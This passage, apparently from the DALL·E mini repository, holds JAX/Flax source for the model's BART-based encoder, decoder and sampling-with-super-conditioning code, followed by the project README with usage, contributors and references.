return outputs class FlaxBartEncoderLayerCollection(nn.Module): config: DalleBartConfig dtype: jnp.dtype = jnp.float32 # the dtype of the computation """ Edits: - use custom FlaxBartEncoderLayer - allow Gradient Checkpointing (nn.remat) """ @nn.compact def __call__( self, hidden_states, attention_mask, deterministic: bool = True, output_attentions: bool = False, output_hidden_states: bool = False, return_dict: bool = True, ): all_hidden_states = () if output_hidden_states else None all_self_attns = () if output_attentions else None n_layers = self.config.encoder_layers layer = ( remat( FlaxBartEncoderLayer, static_argnums=(2, 3), prevent_cse=not self.config.use_scan, ) if self.config.gradient_checkpointing else FlaxBartEncoderLayer ) if self.config.use_scan: # all blocks are the same so we use nn.scan assert not output_attentions, "cannot scan with output_attentions" assert not output_hidden_states, "cannot scan with output_hidden_states" hidden_states = (hidden_states,) # we use a scale on all norms (even last layer) to allow scanning hidden_states, _ = nn.scan( layer, variable_axes={"params": 0, "cache": 0}, split_rngs={"params": True, "dropout": True}, in_axes=(nn.broadcast, nn.broadcast, nn.broadcast), length=n_layers, )( self.config, dtype=self.dtype, add_norm=self.config.ln_positions == "postln", name="FlaxBartEncoderLayers", )( hidden_states, attention_mask, output_attentions, deterministic, ) hidden_states = hidden_states[0] else: for i in range(n_layers): if output_hidden_states: all_hidden_states += (hidden_states,) # final layernorm on the output of the last layer # or every 6 layers for Swin v2 add_norm = self.config.ln_positions == "postln" or ( self.config.ln_positions == "swinv2" and ((i + 1) % 6 == 0) and (i != n_layers - 1) ) # we don't need to scale the norm for the last layer use_scale = i != n_layers - 1 layer_outputs = layer( self.config, dtype=self.dtype, add_norm=add_norm, use_scale=use_scale, name=f"FlaxBartEncoderLayer_{i}", )( hidden_states, attention_mask, output_attentions, deterministic, ) hidden_states = layer_outputs[0] if output_attentions: all_self_attns += (layer_outputs[1],) # add hidden states from the last layer if output_hidden_states: all_hidden_states += (hidden_states,) outputs = [ hidden_states, all_hidden_states, all_self_attns, ] if not return_dict: return tuple(v for v in outputs if v is not None) return FlaxBaseModelOutput( last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_self_attns, ) class FlaxBartDecoderLayerCollection(nn.Module): config: DalleBartConfig dtype: jnp.dtype = jnp.float32 # the dtype of the computation """ Edits: - use custom FlaxBartDecoderLayer - allow Gradient Checkpointing (nn.remat) """ @nn.compact def __call__( self, hidden_states, attention_mask, encoder_hidden_states: Optional[jnp.ndarray] = None, encoder_attention_mask: Optional[jnp.ndarray] = None, deterministic: bool = True, init_cache: bool = False, output_attentions: bool = False, output_hidden_states: bool = False, return_dict: bool = True, ): # decoder layers all_hidden_states = () if output_hidden_states else None all_self_attns = () if output_attentions else None all_cross_attentions = ( () if (output_attentions and encoder_hidden_states is not None) else None ) n_layers = self.config.decoder_layers layer = ( remat( FlaxBartDecoderLayer, static_argnums=(4, 5, 6), prevent_cse=not self.config.use_scan, ) if self.config.gradient_checkpointing else FlaxBartDecoderLayer ) if self.config.use_scan: # all blocks are the same so we use nn.scan assert not output_attentions, "cannot scan with output_attentions" assert not output_hidden_states, "cannot scan with output_hidden_states" hidden_states = (hidden_states,) # we use a scale on all norms (even last layer) to allow scanning hidden_states, _ = nn.scan( layer, variable_axes={"params": 0, "cache": 0}, split_rngs={"params": True, "dropout": True}, in_axes=( nn.broadcast, nn.broadcast, nn.broadcast, nn.broadcast, nn.broadcast, nn.broadcast, ), length=n_layers, )( self.config, dtype=self.dtype, add_norm=self.config.ln_positions == "postln", name="FlaxBartDecoderLayers", )( hidden_states, attention_mask, encoder_hidden_states, encoder_attention_mask, init_cache, output_attentions, deterministic, ) hidden_states = hidden_states[0] else: for i in range(n_layers): if output_hidden_states: all_hidden_states += (hidden_states,) # final layernorm on the output of the last layer # or every 6 layers for Swin v2 add_norm = self.config.ln_positions == "postln" or ( self.config.ln_positions == "swinv2" and ((i + 1) % 6 == 0) and (i != n_layers - 1) ) # we don't need to scale the norm for the last layer use_scale = i != n_layers - 1 layer_outputs = layer( self.config, dtype=self.dtype, add_norm=add_norm, use_scale=use_scale, name=f"FlaxBartDecoderLayer_{i}", )( hidden_states, attention_mask, encoder_hidden_states, encoder_attention_mask, init_cache, output_attentions, deterministic, ) hidden_states = layer_outputs[0] if output_attentions: all_self_attns += (layer_outputs[1],) if encoder_hidden_states is not None: all_cross_attentions += (layer_outputs[2],) # add hidden states from the last decoder layer if output_hidden_states: all_hidden_states += (hidden_states,) outputs = [ hidden_states, all_hidden_states, all_self_attns, all_cross_attentions, ] if not return_dict: return tuple(v for v in outputs if v is not None) return FlaxBaseModelOutputWithPastAndCrossAttentions( last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_self_attns, cross_attentions=all_cross_attentions, ) class FlaxBartEncoder(nn.Module): config: DalleBartConfig embed_tokens: nn.Embed dtype: jnp.dtype = jnp.float32 # the dtype of the computation """ Edits: - offset set to 0 (no padding token) - use max_text_length instead of max_position_embeddings - use custom FlaxBartEncoderLayerCollection - embed_tokens cannot be None (issue at compile time) """ def setup(self): self.dropout_layer = nn.Dropout(rate=self.config.dropout) embed_dim = self.config.d_model self.padding_idx = self.config.pad_token_id self.embed_scale = math.sqrt(embed_dim) if self.config.scale_embedding else 1.0 # Bart is set up so that if padding_idx is specified then offset the embedding ids by 2 # and adjust num_embeddings appropriately. Other models don't have this hack self.offset = 0 if self.config.use_absolute_position_embeddings: self.embed_positions = nn.Embed( self.config.max_text_length + self.offset, # image length for BOS embed_dim, embedding_init=jax.nn.initializers.normal(self.config.init_std), ) self.layers = FlaxBartEncoderLayerCollection(self.config, self.dtype) self.layernorm_embedding = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05 ) # postln is already applied in every layer if self.config.use_final_ln_encoder and self.config.ln_positions != "postln": self.final_ln = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, ) else: self.final_ln = None def __call__( self, input_ids, attention_mask, position_ids, output_attentions: bool = False, output_hidden_states: bool = False, return_dict: bool = True, deterministic: bool = True, ): input_shape = input_ids.shape input_ids = input_ids.reshape(-1, input_shape[-1]) hidden_states = self.embed_tokens(input_ids) * self.embed_scale if self.config.use_absolute_position_embeddings: embed_pos = self.embed_positions(position_ids + self.offset) hidden_states = hidden_states + embed_pos hidden_states = self.layernorm_embedding(hidden_states) hidden_states = self.dropout_layer(hidden_states, deterministic=deterministic) outputs = self.layers( hidden_states, attention_mask, deterministic=deterministic, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) if self.final_ln is None: final_output = outputs[0] else: final_output = self.final_ln(outputs[0]) if not return_dict: return (final_output,) + outputs[1:] return FlaxBaseModelOutput( last_hidden_state=final_output, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) class FlaxBartDecoder(nn.Module): config: DalleBartConfig embed_tokens: nn.Embed dtype: jnp.dtype = jnp.float32 # the dtype of the computation """ Edits: - offset set to 0 (no padding token) - use image_length instead of max_position_embeddings - use custom FlaxBartDecoderLayerCollection - embed_tokens cannot be None (issue at compile time) """ def setup(self): self.dropout_layer = nn.Dropout(rate=self.config.dropout) embed_dim = self.config.d_model self.padding_idx = self.config.pad_token_id self.embed_scale = ( math.sqrt(self.config.d_model) if self.config.scale_embedding else 1.0 ) # Bart is set up so that if padding_idx is specified then offset the embedding ids by 2 # and adjust num_embeddings appropriately. Other models don't have this hack self.offset = 0 if self.config.use_absolute_position_embeddings: self.embed_positions = nn.Embed( self.config.image_length + self.offset, # image length for BOS embed_dim, embedding_init=jax.nn.initializers.normal(self.config.init_std), ) self.layers = FlaxBartDecoderLayerCollection(self.config, self.dtype) self.layernorm_embedding = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05 ) # postln is already applied in every layer if self.config.use_final_ln_decoder and self.config.ln_positions != "postln": self.final_ln = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, ) def __call__( self, input_ids, attention_mask, position_ids, encoder_hidden_states: Optional[jnp.ndarray] = None, encoder_attention_mask: Optional[jnp.ndarray] = None, init_cache: bool = False, output_attentions: bool = False, output_hidden_states: bool = False, return_dict: bool = True, deterministic: bool = True, ): input_shape = input_ids.shape input_ids = input_ids.reshape(-1, input_shape[-1]) hidden_states = self.embed_tokens(input_ids) * self.embed_scale if self.config.use_absolute_position_embeddings: embed_pos = self.embed_positions(position_ids + self.offset) hidden_states = hidden_states + embed_pos hidden_states = self.layernorm_embedding(hidden_states) hidden_states = self.dropout_layer(hidden_states, deterministic=deterministic) outputs = self.layers( hidden_states, attention_mask, encoder_hidden_states, encoder_attention_mask, deterministic=deterministic, init_cache=init_cache, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) if self.final_ln is None: final_output = outputs[0] else: final_output = self.final_ln(outputs[0]) if not return_dict: return (final_output,) + outputs[1:] return FlaxBaseModelOutputWithPastAndCrossAttentions( last_hidden_state=final_output, hidden_states=outputs.hidden_states, attentions=outputs.attentions, cross_attentions=outputs.cross_attentions, ) class FlaxBartModule(FlaxBartModule): """ Edits - use custom FlaxBartEncoder & FlaxBartDecoder - use separate embeddings for Encoder & Decoder """ def setup(self): encoder_embed_tokens = nn.Embed( self.config.encoder_vocab_size, self.config.d_model, embedding_init=jax.nn.initializers.normal(self.config.init_std), ) decoder_embed_tokens = nn.Embed( self.config.image_vocab_size + 1, # image vocab size + 1 for BOS self.config.d_model, embedding_init=jax.nn.initializers.normal(self.config.init_std), ) self.encoder = FlaxBartEncoder( self.config, dtype=self.dtype, embed_tokens=encoder_embed_tokens ) self.decoder = FlaxBartDecoder( self.config, dtype=self.dtype, embed_tokens=decoder_embed_tokens ) class FlaxBartForConditionalGenerationModule(FlaxBartForConditionalGenerationModule): """ Edits: - no bias - lm_head set to image_vocab_size + 1 (for BOS) - uses custom FlaxBartModule """ def setup(self): self.model = FlaxBartModule(config=self.config, dtype=self.dtype) self.lm_head = nn.Dense( self.config.image_vocab_size + 1, # image vocab size + 1 for BOS to have same size as decoder inputs (for sharding) use_bias=False, dtype=self.dtype, kernel_init=jax.nn.initializers.normal(self.config.init_std), ) def __call__( self, input_ids, attention_mask, decoder_input_ids, decoder_attention_mask, position_ids, decoder_position_ids, output_attentions: bool = False, output_hidden_states: bool = False, return_dict: bool = True, deterministic: bool = True, ): outputs = self.model( input_ids=input_ids, attention_mask=attention_mask, decoder_input_ids=decoder_input_ids, decoder_attention_mask=decoder_attention_mask, position_ids=position_ids, decoder_position_ids=decoder_position_ids, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, deterministic=deterministic, ) hidden_states = outputs[0] if self.config.tie_word_embeddings: shared_embedding = self.model.variables["params"]["shared"]["embedding"] lm_logits = self.lm_head.apply( {"params": {"kernel": shared_embedding.T}}, hidden_states ) else: lm_logits = self.lm_head(hidden_states) if not return_dict: output = (lm_logits,) + outputs[1:] return output return FlaxSeq2SeqLMOutput( logits=lm_logits, decoder_hidden_states=outputs.decoder_hidden_states, decoder_attentions=outputs.decoder_attentions, cross_attentions=outputs.cross_attentions, encoder_last_hidden_state=outputs.encoder_last_hidden_state, encoder_hidden_states=outputs.encoder_hidden_states, encoder_attentions=outputs.encoder_attentions, ) @flax.struct.dataclass class SampleState: cur_len: jnp.ndarray sequences: jnp.ndarray running_token: jnp.ndarray is_sent_finished: jnp.ndarray prng_key: jnp.ndarray model_kwargs: Dict[str, jnp.ndarray] model_kwargs_uncond: Dict[str, jnp.ndarray] @flax.struct.dataclass class FlaxSampleOutput(ModelOutput): """ Flax Base class for outputs of decoder-only generation models using sampling. Args: sequences (`jnp.ndarray` of shape `(batch_size, max_length)`): The generated sequences. """ sequences: jnp.ndarray = None class DalleBart(PretrainedFromWandbMixin, FlaxBartForConditionalGeneration): """ Edits: - renamed from FlaxBartForConditionalGeneration - uses custom FlaxBartForConditionalGenerationModule - no bias in decode method - custom prepare_inputs_for_generation using "max_length - 1" to avoid issues related to position embedding during model.generate() - custom generate method to allow super conditions - num_params property - unscan function """ module_class = FlaxBartForConditionalGenerationModule config_class = DalleBartConfig def num_params(self, params=None): if params is None: params = self.params num_params = jax.tree_util.tree_map( lambda param: param.size, flatten_dict(unfreeze(params)) ).values() return sum(list(num_params)) def unscan(self, params): if self.config.use_scan: self.config.use_scan = False params = flatten_dict(params) scanned_keys = [k for k in params.keys() if "layers" in k] for k in scanned_keys: v = params[k] name_idx = k.index("layers") + 1 for i in range(len(v)): new_k = ( *k[:name_idx], f"{k[name_idx][:-1]}_{i}", *k[name_idx + 1 :], ) params[new_k] = v[i] del params[k] params = unflatten_dict(params) return params def decode( self, decoder_input_ids, encoder_outputs, encoder_attention_mask: Optional[jnp.ndarray] = None, decoder_attention_mask: Optional[jnp.ndarray] = None, decoder_position_ids: Optional[jnp.ndarray] = None, past_key_values: dict = None, output_attentions: Optional[bool] = None, output_hidden_states: Optional[bool] = None, return_dict: Optional[bool] = None, train: bool = False, params: dict = None, dropout_rng: PRNGKey = None, ): output_attentions = ( output_attentions if output_attentions is not None else self.config.output_attentions ) output_hidden_states = ( output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states ) return_dict = ( return_dict if return_dict is not None else self.config.return_dict ) encoder_hidden_states = encoder_outputs[0] if encoder_attention_mask is None: batch_size, sequence_length = encoder_hidden_states.shape[:2] encoder_attention_mask = jnp.ones((batch_size, sequence_length)) batch_size, sequence_length = decoder_input_ids.shape if decoder_attention_mask is None: decoder_attention_mask = jnp.ones((batch_size, sequence_length)) if decoder_position_ids is None: if past_key_values is not None: raise ValueError( "Make sure to provide `decoder_position_ids` when passing `past_key_values`." ) decoder_position_ids = jnp.broadcast_to( jnp.arange(sequence_length)[None, :], (batch_size, sequence_length) ) # Handle any PRNG if needed rngs = {} if dropout_rng is not None: rngs["dropout"] = dropout_rng inputs = {"params": params or self.params} # if past_key_values are passed then cache is already initialized a private flag init_cache has to be # passed down to ensure cache is used. It has to be made sure that cache is marked as mutable so that # it can be changed by FlaxBartAttention module if past_key_values: inputs["cache"] = past_key_values mutable = ["cache"] else: mutable = False def _decoder_forward( module, decoder_input_ids, decoder_attention_mask, decoder_position_ids, **kwargs, ): decoder_module = module._get_decoder_module() outputs = decoder_module( decoder_input_ids, decoder_attention_mask, decoder_position_ids, **kwargs, ) hidden_states = outputs[0] if self.config.tie_word_embeddings: shared_embedding = module.model.variables["params"]["shared"][ "embedding" ] lm_logits = module.lm_head.apply( {"params": {"kernel": shared_embedding.T}}, hidden_states ) else: lm_logits = module.lm_head(hidden_states) return lm_logits, outputs outputs = self.module.apply( inputs, decoder_input_ids=jnp.array(decoder_input_ids, dtype="i4"), decoder_attention_mask=jnp.array(decoder_attention_mask, dtype="i4"), decoder_position_ids=jnp.array(decoder_position_ids, dtype="i4"), encoder_hidden_states=encoder_hidden_states, encoder_attention_mask=jnp.array(encoder_attention_mask, dtype="i4"), output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, deterministic=not train, rngs=rngs, mutable=mutable, method=_decoder_forward, ) if past_key_values is None: lm_logits, decoder_outputs = outputs else: (lm_logits, decoder_outputs), past = outputs if return_dict: outputs = FlaxCausalLMOutputWithCrossAttentions( logits=lm_logits, hidden_states=decoder_outputs.hidden_states, attentions=decoder_outputs.attentions, cross_attentions=decoder_outputs.cross_attentions, ) else: outputs = (lm_logits,) + decoder_outputs[1:] # add updated cache to model output if past_key_values is not None and return_dict: outputs["past_key_values"] = unfreeze(past["cache"]) return outputs elif past_key_values is not None and not return_dict: outputs = outputs[:1] + (unfreeze(past["cache"]),) + outputs[1:] return outputs def prepare_inputs_for_generation( self, decoder_input_ids, max_length, attention_mask: Optional[jnp.DeviceArray] = None, decoder_attention_mask: Optional[jnp.DeviceArray] = None, encoder_outputs=None, **kwargs, ): # initializing the cache batch_size, seq_length = decoder_input_ids.shape past_key_values = self.init_cache(batch_size, max_length - 1, encoder_outputs) # Note that usually one would have to put 0's in the attention_mask for x > input_ids.shape[-1] and x < cache_length. # But since the decoder uses a causal mask, those positions are masked anyways. # Thus we can create a single static attention_mask here, which is more efficient for compilation extended_attention_mask = jnp.ones((batch_size, max_length - 1), dtype="i4") if decoder_attention_mask is not None: position_ids = decoder_attention_mask.cumsum(axis=-1) - 1 extended_attention_mask = lax.dynamic_update_slice( extended_attention_mask, decoder_attention_mask, (0, 0) ) else: position_ids = jnp.broadcast_to( jnp.arange(seq_length, dtype="i4")[None, :], (batch_size, seq_length) ) return { "past_key_values": past_key_values, "encoder_outputs": encoder_outputs, "encoder_attention_mask": attention_mask, "decoder_attention_mask": extended_attention_mask, "decoder_position_ids": position_ids, } def generate( self, input_ids: jnp.ndarray, attention_mask: Optional[jnp.ndarray] = None, max_length: Optional[int] = None, pad_token_id: Optional[int] = None, bos_token_id: Optional[int] = None, eos_token_id: Optional[int] = None, decoder_start_token_id: Optional[int] = None, do_sample: Optional[bool] = None, prng_key: Optional[jnp.ndarray] = None, top_k: Optional[int] = None, top_p: Optional[float] = None, temperature: Optional[float] = None, num_beams: Optional[int] = None, no_repeat_ngram_size: Optional[int] = None, min_length: Optional[int] = None, forced_bos_token_id: Optional[int] = None, forced_eos_token_id: Optional[int] = None, length_penalty: Optional[float] = None, early_stopping: Optional[bool] = None, trace: bool = True, params: Optional[Dict[str, jnp.ndarray]] = None, condition_scale: Optional[float] = 1.0, input_ids_uncond: Optional[jnp.ndarray] = None, attention_mask_uncond: Optional[jnp.ndarray] = None, **model_kwargs, ): """Edit: Allow super conditioning.""" # set init values max_length = max_length if max_length is not None else self.config.max_length bos_token_id = ( bos_token_id if bos_token_id is not None else self.config.bos_token_id ) pad_token_id = ( pad_token_id if pad_token_id is not None else self.config.pad_token_id ) eos_token_id = ( eos_token_id if eos_token_id is not None else self.config.eos_token_id ) decoder_start_token_id = ( decoder_start_token_id if decoder_start_token_id else self.config.decoder_start_token_id ) prng_key = prng_key if prng_key is not None else jax.random.PRNGKey(0) if decoder_start_token_id is None and self.config.is_encoder_decoder: raise ValueError( "`decoder_start_token_id` has to be defined for encoder-decoder generation." ) do_sample = do_sample if do_sample is not None else self.config.do_sample num_beams = num_beams if num_beams is not None else self.config.num_beams if self.config.is_encoder_decoder: # add encoder_outputs to model_kwargs if model_kwargs.get("encoder_outputs") is None: model_kwargs_input = dict(model_kwargs) model_kwargs = self._prepare_encoder_decoder_kwargs_for_generation( input_ids, params, {"attention_mask": attention_mask, **model_kwargs_input}, ) if condition_scale != 1.0: assert ( input_ids_uncond is not None ), "`input_ids_uncond` has to be defined for super conditioning." assert ( do_sample is True ), "`do_sample` has to be True for super conditioning." assert ( num_beams == 1 ), "`num_beams` has to be 1 for super conditioning." model_kwargs_uncond = ( self._prepare_encoder_decoder_kwargs_for_generation( input_ids_uncond, params, { "attention_mask": attention_mask_uncond, **model_kwargs_input, }, ) ) else: model_kwargs_uncond = None # prepare decoder_input_ids for generation input_ids = ( jnp.ones((input_ids.shape[0], 1), dtype="i4") * decoder_start_token_id ) if not do_sample and num_beams == 1: logits_processor = self._get_logits_processor( no_repeat_ngram_size, min_length, max_length, eos_token_id, forced_bos_token_id, forced_eos_token_id, ) return self._greedy_search( input_ids, max_length, pad_token_id, eos_token_id, logits_processor=logits_processor, trace=trace, params=params, model_kwargs=model_kwargs, ) elif do_sample and num_beams == 1: logits_warper = self._get_logits_warper( top_k=top_k, top_p=top_p, temperature=temperature ) logits_processor = self._get_logits_processor( no_repeat_ngram_size, min_length, max_length, eos_token_id, forced_bos_token_id, forced_eos_token_id, ) return self._sample( input_ids, max_length, pad_token_id, eos_token_id, prng_key, logits_warper=logits_warper, logits_processor=logits_processor, trace=trace, params=params, model_kwargs=model_kwargs, condition_scale=condition_scale, model_kwargs_uncond=model_kwargs_uncond, ) elif not do_sample and num_beams > 1: # broadcast input_ids & encoder_outputs input_ids = self._expand_to_num_beams(input_ids, num_beams=num_beams) if "encoder_outputs" in model_kwargs: model_kwargs["encoder_outputs"][ "last_hidden_state" ] = self._expand_to_num_beams( model_kwargs["encoder_outputs"]["last_hidden_state"], num_beams=num_beams, ) if "attention_mask" in model_kwargs: model_kwargs["attention_mask"] = self._expand_to_num_beams( model_kwargs["attention_mask"], num_beams=num_beams ) logits_processor = self._get_logits_processor( no_repeat_ngram_size, min_length, max_length, eos_token_id, forced_bos_token_id, forced_eos_token_id, ) return self._beam_search( input_ids, max_length, pad_token_id, eos_token_id, length_penalty=length_penalty, early_stopping=early_stopping, logits_processor=logits_processor, trace=trace, params=params, model_kwargs=model_kwargs, ) else: raise NotImplementedError("`Beam sampling is currently not implemented.") def _sample( self, input_ids: None, max_length: Optional[int] = None, pad_token_id: Optional[int] = None, eos_token_id: Optional[int] = None, prng_key: Optional[jnp.ndarray] = None, logits_processor=None, logits_warper=None, trace: bool = True, params: Optional[Dict[str, jnp.ndarray]] = None, model_kwargs: Optional[Dict[str, jnp.ndarray]] = None, condition_scale: float = 1.0, model_kwargs_uncond: Optional[Dict[str, jnp.ndarray]] = None, ): # init values max_length = max_length if max_length is not None else self.config.max_length pad_token_id = ( pad_token_id if pad_token_id is not None else self.config.pad_token_id ) eos_token_id = ( eos_token_id if eos_token_id is not None else self.config.eos_token_id ) prng_key = prng_key if prng_key is not None else jax.random.PRNGKey(0) batch_size, cur_len = input_ids.shape eos_token_id = jnp.array(eos_token_id) pad_token_id = jnp.array(pad_token_id) cur_len = jnp.array(cur_len) # per batch-item holding current token in loop. sequences = jnp.full((batch_size, max_length), pad_token_id, dtype=jnp.int32) sequences = lax.dynamic_update_slice(sequences, input_ids, (0, 0)) # per batch-item state bit indicating if sentence has finished. is_sent_finished = jnp.zeros((batch_size,), dtype=jnp.bool_) # For Seq2Seq generation, we only need to use the decoder instead of the whole model in generation loop # and pass it the `encoder_outputs`, which are part of the `model_kwargs`. model = self.decode if self.config.is_encoder_decoder else self # initialize model specific kwargs model_kwargs = self.prepare_inputs_for_generation( input_ids, max_length, **model_kwargs ) if condition_scale != 1.0: model_kwargs_uncond = self.prepare_inputs_for_generation( input_ids, max_length, **model_kwargs_uncond ) # initialize state state = SampleState( cur_len=cur_len, sequences=sequences, running_token=input_ids, is_sent_finished=is_sent_finished, prng_key=prng_key, model_kwargs=model_kwargs, model_kwargs_uncond=model_kwargs_uncond, ) def sample_search_cond_fn(state): """state termination condition fn.""" has_reached_max_length = state.cur_len == max_length all_sequence_finished = jnp.all(state.is_sent_finished) finish_generation = jnp.logical_or( has_reached_max_length, all_sequence_finished ) return ~finish_generation def sample_search_body_fn(state): """state update fn.""" prng_key, prng_key_next = jax.random.split(state.prng_key) model_outputs = model( state.running_token, params=params, **state.model_kwargs ) logits = model_outputs.logits[:, -1] # perform super conditioning # Source: @RiversHaveWings - https://twitter.com/RiversHaveWings/status/1478093658716966912?s=20&t=xdm-wZ61Wf7OLnE_NJHZ1w if condition_scale != 1.0: model_outputs_uncond = model( state.running_token, params=params, **state.model_kwargs_uncond ) logits_uncond = model_outputs_uncond.logits[:, -1] logits = logits_uncond + condition_scale * (logits - logits_uncond) else: model_outputs_uncond = None # apply min_length, ... logits = logits_processor(state.sequences, logits, state.cur_len) # apply top_k, top_k, temperature logits = logits_warper(logits, logits, state.cur_len) next_token = jax.random.categorical(prng_key, logits, axis=-1) next_is_sent_finished = state.is_sent_finished | ( next_token == eos_token_id ) next_token = ( next_token * ~next_is_sent_finished + pad_token_id * next_is_sent_finished ) next_token = next_token[:, None] next_sequences = lax.dynamic_update_slice( state.sequences, next_token, (0, state.cur_len) ) next_model_kwargs = self.update_inputs_for_generation( model_outputs, state.model_kwargs ) next_model_kwargs_uncond = ( self.update_inputs_for_generation( model_outputs_uncond, state.model_kwargs_uncond ) if condition_scale != 1.0 else None ) return SampleState( cur_len=state.cur_len + 1, sequences=next_sequences, running_token=next_token, is_sent_finished=next_is_sent_finished, model_kwargs=next_model_kwargs, model_kwargs_uncond=next_model_kwargs_uncond, prng_key=prng_key_next, ) # The very first prompt often has sequence length > 1, so run outside of `lax.while_loop` to comply with TPU if input_ids.shape[1] > 1: state = sample_search_body_fn(state) if not trace: state = self._run_loop_in_debug( sample_search_cond_fn, sample_search_body_fn, state ) else: state = lax.while_loop(sample_search_cond_fn, sample_search_body_fn, state) return FlaxSampleOutput(sequences=state.sequences)
# DALL·E Mini <a href="https://www.craiyon.com/"><img src="https://www.craiyon.com/thumbnail.png" width="300"></a> ## How to use it? You can use the model on [🖍️ craiyon](https://www.craiyon.com/) ## How does it work? Refer to our reports: * [DALL·E mini - Generate Images from Any Text Prompt](https://wandb.ai/dalle-mini/dalle-mini/reports/DALL-E-mini-Generate-images-from-any-text-prompt--VmlldzoyMDE4NDAy) * [DALL·E mini - Explained](https://wandb.ai/dalle-mini/dalle-mini/reports/DALL-E-Mini-Explained-with-Demo--Vmlldzo4NjIxODA) * [DALL·E mega - Training Journal](https://wandb.ai/dalle-mini/dalle-mini/reports/DALL-E-Mega-Training-Journal--VmlldzoxODMxMDI2) ## Development ### Dependencies Installation For inference only, use `pip install dalle-mini`. For development, clone the repo and use `pip install -e ".[dev]"`. Before making a PR, check style with `make style`. You can experiment with the pipeline step by step through our [`inference pipeline notebook`](tools/inference/inference_pipeline.ipynb) [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/borisdayma/dalle-mini/blob/main/tools/inference/inference_pipeline.ipynb) ### Training of DALL·E mini Use [`tools/train/train.py`](tools/train/train.py). You can also adjust the [sweep configuration file](https://docs.wandb.ai/guides/sweeps) if you need to perform a hyperparameter search. ## FAQ ### Where to find the latest models? Trained models are on 🤗 Model Hub: * [VQGAN-f16-16384](https://huggingface.co/dalle-mini/vqgan_imagenet_f16_16384) for encoding/decoding images * [DALL·E mini](https://huggingface.co/dalle-mini/dalle-mini) or [DALL·E mega](https://huggingface.co/dalle-mini/dalle-mega) for generating images from a text prompt ### Where does the logo come from? The "armchair in the shape of an avocado" was used by OpenAI when releasing DALL·E to illustrate the model's capabilities. Having successful predictions on this prompt represents a big milestone for us. ## Contributing Join the community on the [LAION Discord](https://discord.gg/xBPBXfcFHd). Any contribution is welcome, from reporting issues to proposing fixes/improvements or testing the model with cool prompts! You can also use these great projects from the community: * spin off your own app with [DALL-E Playground repository](https://github.com/saharmor/dalle-playground) (thanks [Sahar](https://twitter.com/theaievangelist)) * try [DALL·E Flow](https://github.com/jina-ai/dalle-flow) project for generating, diffusion, and upscaling in a Human-in-the-Loop workflow (thanks [Han Xiao](https://github.com/hanxiao)) [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/jina-ai/dalle-flow/blob/main/client.ipynb) * run on [Replicate](https://replicate.com/borisdayma/dalle-mini), in the browser or via API ## Acknowledgements * 🤗 Hugging Face for organizing [the FLAX/JAX community week](https://github.com/huggingface/transformers/tree/master/examples/research_projects/jax-projects) * Google [TPU Research Cloud (TRC) program](https://sites.research.google/trc/) for providing computing resources * [Weights & Biases](https://wandb.com/) for providing the infrastructure for experiment tracking and model management ## Authors & Contributors DALL·E mini was initially developed by: * [Boris Dayma](https://github.com/borisdayma) * [Suraj Patil](https://github.com/patil-suraj) * [Pedro Cuenca](https://github.com/pcuenca) * [Khalid Saifullah](https://github.com/khalidsaifullaah) * [Tanishq Abraham](https://github.com/tmabraham) * [Phúc Lê Khắc](https://github.com/lkhphuc) * [Luke Melas](https://github.com/lukemelas) * [Ritobrata Ghosh](https://github.com/ghosh-r) Many thanks to the people who helped make it better: * the [DALLE-Pytorch](https://discord.gg/xBPBXfcFHd) and [EleutherAI](https://www.eleuther.ai/) communities for testing and exchanging cool ideas * [Rohan Anil](https://github.com/rohan-anil) for adding Distributed Shampoo optimizer and always giving great suggestions * [Phil Wang](https://github.com/lucidrains) has provided a lot of cool implementations of transformer variants and gives interesting insights with [x-transformers](https://github.com/lucidrains/x-transformers) * [Katherine Crowson](https://github.com/crowsonkb) for [super conditioning](https://twitter.com/RiversHaveWings/status/1478093658716966912) * the [Gradio team](https://gradio.app/) made an amazing UI for our app ## Citing DALL·E mini If you find DALL·E mini useful in your research or wish to refer, please use the following BibTeX entry. ```text @misc{Dayma_DALL·E_Mini_2021, author = {Dayma, Boris and Patil, Suraj and Cuenca, Pedro and Saifullah, Khalid and Abraham, Tanishq and Lê Khắc, Phúc and Melas, Luke and Ghosh, Ritobrata}, doi = {10.5281/zenodo.5146400}, month = {7}, title = {DALL·E Mini}, url = {https://github.com/borisdayma/dalle-mini}, year = {2021} } ``` ## References Original DALL·E from "[Zero-Shot Text-to-Image Generation](https://arxiv.org/abs/2102.12092)" with image quantization from "[Learning Transferable Visual Models From Natural Language Supervision](https://arxiv.org/abs/2103.00020)". Image encoder from "[Taming Transformers for High-Resolution Image Synthesis](https://arxiv.org/abs/2012.09841v2)". Sequence to sequence model based on "[BART: Denoising Sequence-to-Sequence Pre-training for Natural Language Generation, Translation, and Comprehension](https://arxiv.org/abs/1910.13461v1)" with implementation of a few variants: * "[GLU Variants Improve Transformer](https://arxiv.org/abs/2002.05202)" * "[Deepnet: Scaling Transformers to 1,000 Layers](https://arxiv.org/abs/2203.00555)" * "[NormFormer: Improved Transformer Pretraining with Extra Normalization](https://arxiv.org/abs/2110.09456)" * "[Swin Transformer: Hierarchical Vision Transformer using Shifted Windows](https://arxiv.org/abs/2103.14030)" * "[CogView: Mastering Text-to-Image Generation via Transformers](https://arxiv.org/abs/2105.13290v2)" * "[Root Mean Square Layer Normalization](https://arxiv.org/abs/1910.07467)" * "[Sinkformers: Transformers with Doubly Stochastic Attention](https://arxiv.org/abs/2110.11773)" * "[Foundation Transformers](https://arxiv.org/abs/2210.06423) Main optimizer (Distributed Shampoo) from "[Scalable Second Order Optimization for Deep Learning](https://arxiv.org/abs/2002.09018)". ### Citations ```text @misc{ 